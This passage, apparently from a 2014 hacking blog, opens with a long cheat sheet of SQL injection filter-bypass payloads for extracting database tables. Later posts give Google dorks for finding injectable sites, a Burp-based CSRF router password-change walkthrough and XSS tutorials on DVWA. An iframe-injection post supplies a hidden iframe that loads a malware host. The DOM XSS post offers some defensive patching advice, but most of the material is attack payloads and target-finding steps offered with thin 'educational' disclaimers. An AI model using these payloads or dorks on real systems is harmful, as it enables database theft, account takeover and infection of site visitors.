union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+


[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))


[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)


[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
when the --+- or -- dosen't work use ;%00


bypass error 505
sometimes when union select ,sites become 505 or time out....
bypass-
-use brackets
union(select+1)
-use %0b or /**/ as space
union%0bselect


Note:

All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...
Posted by Pak Defndr at 06:17 0 comments
Labels:

Monday 3 November 2014

Snow Bross Free Online Games


Play Snow Bros free Online




Read more...
Posted by Pak Defndr at 22:54 0 comments
Labels:

Grand Theft Auto Full Game Free Play Online

 

Grand Theft Auto Full Game Free Play Online Is Now Available Here. GTA One Of The Top Popular Series Publisher By Rockstar Games And Enjoy To Play Everyone. Everyone Enjoy To Played This Series On Their Personal Computer But Now You Can Play Right Now. How To Play- Just Visit The Instruction Pages.


Wait Few Minutes To Loads Game Properly- 1% To 100% Complete To Start Click Play


 


Read more...
Posted by Pak Defndr at 08:19 0 comments
Labels:

Mustapha Game Totally Free Play Online

Mustapha Game Free Play Online Is Right Now. Easily To Start And Enjoy To Play Right Here. Top Action Both Fighting DiversionLike To Play Everyone. Note: You Have To Need Good Internet Connection And Check Your Adobe Flash Player Before Start. Normally Control Key Used By Player1 Mode: WASD Move Key And HJK Action Key And Player2 Mode: Arrow Key Move And 123 Numeric Button Key.


 
Mustapha Games Play Online Now

Read more...
Posted by Pak Defndr at 08:05 0 comments
Labels:

Desperado Full Game Free Play Online

Wait Few Minutes To Loads Desperado Game Properly- 1% To 100% Complete To Start Click Play





Read more...
Posted by Pak Defndr at 06:15 0 comments
Labels: ,

Thursday 30 October 2014

How to make your own software installer.......

Today i will show you how to make your own software as a installer so watch this and feel free to comment........

Software Installer by Pak Defender from Anonymous Ghost on Vimeo.

Read more...
Posted by Pak Defndr at 08:10 0 comments
Labels: ,

How to Install Wordpress On Xammp....

Today I will show you how to install wordpress on xampp watch this and feel free to comment.......

Install Wordpress on Xammp from Anonymous Ghost on Vimeo.

Read more...
Posted by Pak Defndr at 07:51 0 comments
Labels: ,

Sunday 26 October 2014

How to Find Injection Point FOR SQL Injection......

 

Hello Guys .....Today i will tell you how to find injection point for sqli in a simple trick and you can easily inject ....


Please every Injectors must comments there methods here which i will ask now
Please every injectors mention there methods to find out
Injection Point in the website[SQLI]



MY methods --->
1. inurl:.php?id= site:www.sitename.com
2.site:www.sitename.com "php?"



Sometimes i use this =>


site:www.target.com php
site:www.sitename.com .php? / .php?id=


Inurl.php?whatever= site:in
ip:127.0.0.7 "php?id"
site:example.com id

site:"*.site.com" inurl:"php?"
site:target.com ".php?id="
site.com/robots.txt



sometimes search fields


This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.


 
Read more...
Posted by Pak Defndr at 04:54 0 comments
Labels: ,

Saturday 18 October 2014

BASIC CSRF (CROSS SITE REQUEST FORGERY) TUTORIAL

This tutorial will explain how to perform A Basic Cross Site Request Forgery Attack (CSRF).

So let's start the tutorial,

What is CSRF Attack?
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
source: owasp​
...
Requirements to practice.

1. Brain
2. Browser
3. Burp Suite (Regular or Professional, both will work)
​...
If you don't have Burp Suite, Download it from
http://portswigger.net/burp/

I won't cover How to set up Burp Suite,
the following is the link to an awesome tut to setup Burp.

http://portswigger.net/burp/tutorials/

...
Let's Start!
...
You have now configured Burp Suite,
Just Start it,
Turn off the Intercept for now.
...
Open Firefox or any other browser,
go to Router Default Gateway:
in mine case it is
http://192.168.1.1/
you will be asked for username and password,
generally most of the routers have default user : password combination as
Code:admin:admin user:user admin:pass admin:password user:password
if you can't open your Router Gateway,
....[ā€‹IMG]
...

now we have successfully opened the Router Gateway,​

...

Find Password Change page,
for my case it was
>Maintainance>Administration​

...

Now we can see the options to change password,

go to Burp Suite Window and Click on
Proxy Tab>Intercept

turn intercept ON.​

...
[ā€‹IMG]


...

and now,
in the input of New Password and Confirm password we will enter:

pass : pass


...
[ā€‹IMG]


...

Note:Old password was 'admin'.​

...

Make sure you have turned intercept ON.
Click on Save in Router Gateway.​

...

Now Burp Window will appear with some sort of HTTP HEADERS and POST details.
you will see at the end,
that, it's displaying what we just entered in the Password form.

uiViewTools_Password=pass&ui.....all that!​

...
[ā€‹IMG]
....

in this http request we can see that there is no ANTI-CSRF protection Token!​

..

Code:Anti-CSRF tokens are some sort of hash or random combinations of letters, numbers, which gets validated on the server to make sure that request is from a authenticated user, with his own permission, not forged!


...

now right click on Burp window,
go to
>Engagement tools>Generate CSRF PoC​

...
[ā€‹IMG]

...

a new window/dialog box will appear with some html codes,
copy that,​

...
[ā€‹IMG]


...

save that code as a html document. / or Test in browser​

...
[ā€‹IMG]

...

Drop the Http Request by clicking on Drop button in the interception tab,​

...
[ā€‹IMG]


...

>This is not change the password!
>Just Stop the request of password change.
>Your Router Gateway still is on old password!​

...
[ā€‹IMG]


...

>For confirmation,
i logged in using old password 'admin'.​

...
[ā€‹IMG]

...

i used the old pass, and logged it,
it means just because i dropped request, password didn't changed to 'pass', and was still the old one, 'admin'.

...

Now Open the .html file you saved in your Drive,
you'll see a submit button,
>Make sure your intercept is ON!​

...
[ā€‹IMG]

...

After Clicking on that,
Again Burp Window will appear,
and show the same HTTP and POST Request which we got after password change page on Router Gateway Before,​

...
[ā€‹IMG]

...

Now Click on Forward, to allow the page to perform requests,​

...
[ā€‹IMG]

...

Voila, You just changed the password using CSRF,
without opening the router page,
without entering details,
password is changed, with POST request,​

...
[ā€‹IMG]

...

Trying new password 'pass', opens the router gateway password change page!​

...
[ā€‹IMG]
...
here is a proof that password changed,​[ā€‹IMG] 




the Authorization header with some base64 is actually the user : pass,​

...
[ā€‹IMG]


[ā€‹IMG]


....

which is the base64 encode of 'admin : pass', the old one was for 'admin:admin'​

...
...

The whole idea behind CSRF is to change user details, without actually letting the victim know, enter, and interact on the target page.
this is done by POST request on sites withno X-Csrf/Anti-Csrf protections.​

...

Some times the site will have Anti Csrf token,
but still an attacker can bypass the Anti-CSRF protections, just by checking if the tokens are validated on server or it's an easily guess-able combination.
>I will post on CSRF protection bypassing, soon.​
....

Thank You!​


This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.
Read more...
Posted by Pak Defndr at 07:38 0 comments
Labels:

Wednesday 24 September 2014

Learn Cross Site Scripting Vulnerability & Exploit (XSS)


Hello, Guys here after short break m back with my Cool Post on XSS (Cross Site Scripting), today m gonna explain you : How Cross Site Scripting works, How to Prevent it and Understanding XSS Vulnerability & Exploits. Basically many of you'd not understood XSS Exploits Properly, So lets create, Explore, learn and Exploit.



Cross Site Scripting (XSS)

          Well, you might have heard a lots about XSS is one of the most easy and Common Web Application Vulnerability that allows an attacker to Inject his own script into Web pages and run into Server and that is really very dangerous. XSS can deface website, hack admin, Steal Session Cookies Modify Web Server and Web Pages etc.


* Simple Explaination of XSS :

             Suppose you create a Website using Some web programming languages like HTML, Javascript or PHP and you create one Input box in your web-page like Please Enter your Name : ,Okay ? & when any normal user will Enter his name like : Vivek then definitely your web-page will reflect that name to the user and says Hello, Vivek. Right ?? (Make sure that you've understand above example Properly, this also requires knowledge of HTML and Javascript Programming languages).


And What if ?  an attacker visits your web-page an he also Inject some Script of HTML Tag and Suppose your Web-page does n't have WAF Protection (WAF : Web Application Firewall : That prevents XSS & SQLi attack and filters your Strings into Characters.). then simply that script will execute webpage and an attacker will able to run his Own Script into Web Pages. So lets learn more about XSS.



Cross Site Scripting tutorial with Programming

                         Okay, guys let's explore Cross Site Scripting and learn advance and more deeper about cross Site Scripting. But you must know HTML, & little bit about Javascript, PHP and HTTP Architecture.


Part 1. Programming & Understanding Reflected XSS Vulnerability.


* So here m using Dawn Pentest Lab to show you tutorial with complete explaination with Programming and Vulnerability Exploits. Even I'll prefer you to use Dawn Pentest Lab to learn this tutorial.


* Start your DVWA Lab Click on XSS Reflected and keep Security Level on Low, for medium and High Exploits we'll increase it.


Click to Enlarge it



1. So, first of all there you can see that it has given us one box asking : What's your name ? well, if you'll enter your Name it will reflect back to you and Say : Hello, Vivek. Just do it and Also remember one thing in XSS always check URL to identify XSS.


Click to Enlarge it



2. Now Just Enter one HTML Tag like this : <Hunt> & Identify what it does ? now right click on webpage & Click on view Page Source, & search for Hunt if you'll see same text into Source Page <Hunt> that means the website is Vulnerable to XSS.


Click to Enlarge it



3. Now, you can see that web-page accepted that HTML tag that means we can Inject our own script into webpage and the web-page doesn't have WAF Protection. So, now let's use some Evil mind :D, use some scripts that can proof that this web-page is really vulnerable to XSS, Basically we always use Javascript <script>alert("XSS")</script>.

 

Click to Enlarge it



4. So you got a Pop-up that saying XSS, that means the website is vulnerable so can u understand ? why did it happens ? Okay..! Now just open Source code and Programming code of this Page Go to : C:\xampp\htdocs\dvwa\vulnerabilities\xss_r\source and Open that low.php file and try to understand it how it works.


Click to Enlarge it



5. Simply you can understand that how it works and it does not contain any types of Protection against XSS and HTML Injection that's the reason the website is vulnerable to XSS, Now let's try something Harder. Open DVWA and Change Security Level to Medium. And do the same thing Enter <Hunt> to check whether it is vulnerable or not ?


Click to Enlarge it



6. Now you can see this is also vulnerable, let's try the same script that we used to Pop-up XSS window in the low level security <script>alert("XSS")</script>. and Submit it.


Click to Enlarge it



7. Hey mate ? But you where sure ? that the website is vulnerable to XSS as it  accepted that HTML tag into webpage <Hunt> so why not it doesn't Pop-up XSS Box ?....! Okay now just once again click on Source Code


                                            Click to Enlarge it




8. Okay, now the website bypassed our HTML tag <script> & removed that from the source code that means the website is using some kind of Protection Against XSS, let's try something new :D Just Enter this Script and I'm sure you'll get XSS Pop-up : <Script>+alert('XSS')</script>.

 

Click to Enlarge it



9. Well, now you'll think what's the matter ? you know the website is using Bypassing techniques to bypass our Strings, now Just go to the same location

C:\xampp\htdocs\dvwa\vulnerabilities\xss_r\source and open medium.php file and Compare it with low.php try to understand how it bypassed your String and protected web-page from first Script Code. You'll see that it contains one more statement that black list your Command <script> and when someone will enter this command then website automatically bypass that string and keep website protected from script command this technique is often used in web-app to protect Web Pages against XSS.


Click to Enlarge it



10. So, that was the reason : The Web site bypassed our code so we used <Script> instead of <script> ..! we can also call it Blacklist. That is blocked by Web Application..!


11. So you might how can we protect our Web-page against XSS attacks ?

let's look into hard level we'll find the answer, Increase Security level to High and do the same thing using <Hunt> method, and View Page source.


Click to Enlarge it



12. Now look into Page Source : This is the biggest challenge for hackers to create and Pop-up XSS into Hard level, it's really very hard you can try as much as you can, This is called WAF : means the Web Application using HTML WAF that filters your Strings into Some HTML characters so no one will able to Inject command into Web Page and there would be no XSS Vulnerability. and Finally you'll see that the it bypass all our script and we're not able to Inject our command into Web Page Source, so explore the high.php file from that location and you'll see it is being protected by htmlspecialchars that bypass every strings, tags that is related to HTML Programming.


                                              Click to Enlarge it




So you might have understood little bit about XSS Vulnerability and Exploitation we'll learn more advance Techniques in Upcoming post so please stay tuned with us and Keep Sharing, and Increase us.


Feel free to comment and Ask your Problem and Please Share it :)

 
Read more...
Posted by Pak Defndr at 07:19 0 comments
Labels: ,

Monday 15 September 2014

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial




So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from here.

Before explaining about the DOM based xss, let me explain what DOM means to.


What is DOM?

DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.



Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.





 
<html> 
<head>
</head>
<body>
     <script>
var pos=document.URL.indexOf("BTSinput=")+9;  //finds the position of value 
var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
document.write(unescape(userInput)); //writes content to the webpage
  </script>
</body>
</html>



If you know HTML and Javscript, understanding the above code is a piece of cake.




In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage.

For example, if the url is
               www.BreakThesecurity.com/PenTesting?BTSinput=default

The webpage will display "default" as output.




Did you notice ?! The part of the webpage is not written by Server-side script.  The client side script modifies the content dynamically based on the input.   Everything done with the help of DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code. 

In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url. 

An attacker with malicious intention can inject a xss vector instead .  For example:


www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>

 



As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage.  So it will write the '<script>alert("BreakTheSec")</script>' in the webpage without sanitizing.  This results in running the script code and displays the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.




This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.



Read more...
Posted by Pak Defndr at 02:49 0 comments
Labels: ,

New XSS Cheat Sheet - Bypassing Modern Web Application Firewall XSS Filters

 

 



While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.

There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won't work with the modern WAFs and latest browsers. 

So, here is need for creating new Cheat sheet.

One of the top security researcher Rafay Baloch has done an excellent job by organizing his own techniques to bypass modern WAFs and published a white paper on that.

The paper titled "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" covers only the techniques needed for bypassing XSS filters.

Rafay promised to write other vulnerabilities' bypassing techniques in his next paper.

You can download the WhitePaper from here.

 

This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.

Read more...
Posted by Pak Defndr at 02:15 0 comments
Labels:

Mass IFrame Attack Tutorial

Recently 90000 webpages infected by Iframe Injection attack.  Here i am going to explain what  IFrame Injection is.

 


What is an IFrame Injection?

Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website.  Malware  will be loaded to your computer, now you are infected


What is IFrame Tag?

<Iframe> tag stands for Inline Frame.  It is used to insert contents from another website or server.  That can be useful for building online applications.

 
IFrame Injection Attack:

Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one pixel square(You won't able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - leaving no obvious clue that it's malicious.
What an attacker can do with Iframe Injection?

Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:

1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Obfuscate javascript
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…

4. So if the clients load page, his system will be infected.

What you have to do ,if youinfected by Iframe Injection?


 

  1. Change your passwords of ftp, control panel and database.

  2. Inform to your hosting service about the injection attack and they will take care of server injection .

  3. Download all your files from the hosting and  check whether they are infected or not. if you found any infected files, clean it.

  4. Buy a good antivirus software, Scan your Computer completely.

  5. Don't use the Public systems for logging into your Hosting service.


Webmasters  should take care(affects page rank,visitors) 

Webmaster, If you find your website is infected by Iframe Injection, then try to clean it as soon as possible before google detects it.  If the google detects it, it will show the Pop up message to your users " This site may harm your computer". Definitely , users won't come back to your site .  Also google will set black mark for your website.  You will lost your page rank and visitors.


If you want to check the what google thinks about your websites, then use this link:
http://www.google.com/safebrowsing/diagnostic?site=http://siteurl

 

This is purely for Educational purpose only. Don't use it for illegal.if you do,  you will be in jail.


 
Read more...
Posted by Pak Defndr at 01:58 0 comments
Labels: ,

Cross Site Scripting(XSS) Complete Tutorial....

 

What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.


Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.


t will be easy to understand XSS , if you have the following prerequisite:




  • Strong Knowledge in HTML,javascript(Reference).

  • Basic Knowledge in HTTP client-Server Architecure(Reference)

  • [optional]Basic Knowledge about server side programming(php,asp,jsp)



XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.





Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .





Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.





Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.




View the source of the page . Find the location where input displayed place in previous test.





Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .





Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.




Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.


Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.

Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

  • Stealing the Identity and Confidential Data(credit card details).

  • Bypassing restriction in websites.

  • Session Hijacking(Stealing session)

  • Malware Attack

  • Website Defacement

  • Denial of Service attacks(Dos)


 

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...
Posted by Pak Defndr at 01:31 0 comments
Labels: , , ,